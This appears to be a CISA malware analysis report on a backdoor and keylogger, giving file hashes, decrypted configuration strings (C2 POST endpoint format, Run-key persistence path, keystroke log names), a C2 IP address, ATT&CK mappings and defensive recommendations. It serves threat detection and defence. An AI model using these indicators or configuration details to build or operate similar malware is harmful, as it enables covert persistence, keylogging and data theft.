SHA512 1d30fb579e0dba09b24669a5a981652f1f6404d2f536e8e640c48585b3035d0826fed15279568400418c19849e17489baccd18e35b53f8cdbc196a0dd5abd496
ssdeep 3:pSMk0eR2Hxm+yn:pSMFeR2Vy
Entropy 4.546046
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
f1a2791eeb... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

This artifact contains a GUID that is generated by the malware to uniquely identify the system during communication with the C2.

f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780

Tags

backdoorkeylogger

Details
Name thumb.dat
Size 58274 bytes
Type data
MD5 84f09d192ec90542ede22c370836ffa6
SHA1 7fb23c6b4db90b55694bdd1cc5c1b4c706a4e181
SHA256 f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780
SHA512 56474f45eed25ab86ac9d17b6afb69e0dee07fe507fc5ac4e22ebae0d124700c533dc2adaaaf4be096a5dab27f7f88c21b290cca600576dbf8f10482f2f62d8b
ssdeep 1536:xy98XehX2k0xfXGxGKt5mzvOOIE3CYzahbdoZJI7Vq:xRX0X90KNtevUXYzahbdfq
Entropy 7.301514
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
f2ba8b8aab... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

This artifact is the encrypted configuration data that is read by 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7 detailed in this report. The decrypted strings in the configuration are listed below:

---Begin Decrypted Strings---
system -k networkservice
svchost.exe
localservice -k localservice
networkservice
clip.log
rb %04/%02d%02d:%02d:%02d
ab+
SOFTWAREMicrosoft
config_ : %d %d %d %d
config.ini
Guid
Config %08X%04X%04X%02X%02X%02X%02X%02X%02X%02X%02X
RtlGetVersion
ntdll.dll
Vista
Win2008
Win7
Win2008(R2)
Win8
Win2012
Win8.1
Win2012(R2)
WinXp
Win2003
Win10
Win2016
IsWow64Process
kernel32
open
%d/%d/%d %d:%d
key.log
explorer.exe
/api/v2/ajax
POST
https://%s:%d/api/v2/ajax
pipetestpipe
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
config.ini
SOFTWAREMicrosoftWindowsCurrentVersionRun
log.log
%s%d
exe
wb
Kernel32.dll
msiexec.exe
cmd.exe
ntdll
SeDebugPrivilege
runas
taskmgr
exe
ccc
bbb
aaa
windefende%d
80A85553-1E05-4323-B4F9-43A4396A4507
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36

---End Decrypted Strings---

This configuration allows the malware to connect to its C2, create persistence on the system, log keystrokes and telemetry data, and execute commands from the command line.

Relationship Summary

df847abbfa... Used 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
52072a8f99... Connected_To 104.168.236.46
52072a8f99... Used_By df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
52072a8f99... Created f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230
52072a8f99... Created f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780
104.168.236.46 Connected_From 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
f1a2791eeb... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
f2ba8b8aab... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7

Conclusion

The following MITRE ATT&CK tactics and techniques were observed during analysis of these samples.

T1543.003 Persistence: Create or Modify System Process. Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg.

T1574.002 Hijack Execution Flow: DLL Side-Loading. Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

T1567.000 Exfiltration: Exfiltration Over Web Service. Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

T1560.000 Collection: Archive Collected Data. An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

Initial Publication: September 29, 2022